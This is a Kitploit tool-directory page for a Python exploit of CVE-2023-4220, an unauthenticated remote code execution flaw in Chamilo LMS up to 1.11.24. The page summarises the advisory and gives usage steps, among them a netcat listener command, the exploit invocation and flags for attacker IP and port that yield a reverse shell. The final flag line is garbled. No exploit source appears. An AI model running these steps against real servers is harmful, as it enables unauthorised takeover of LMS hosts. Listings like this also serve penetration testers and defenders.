Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-4220-RCE — Python exploit for CVE-2023-4220, an unauthenticated remote code execution in Chamilo LMS via unrestricted file upload, enabling web shell deployment and reverse shell. | Kitploit
Tools/GitHubGitHub/bueno-armando/cve-2023-4220-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubbueno-armando/cve-2023-4220-rce

CVE-2023-4220-RCE

Python exploit for CVE-2023-4220, an unauthenticated remote code execution in Chamilo LMS via unrestricted file upload, enabling web shell deployment and reverse shell.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-4220-RCE

Summary

Starlabs advisory

  • Affected product: Chamilo <= v1.11.24
  • Description: Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
  • CVSS Score: 8.1 (High)

Usage

  1. Set up a netcat listener (if you want a reverse shell)
sudo nc -lnvp 443
  1. Run the exploit
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
  • Flags for reverse shell
    • -lh/--localhost: Attacker IP
    • **-lp/--localtcat listener port
Download Tool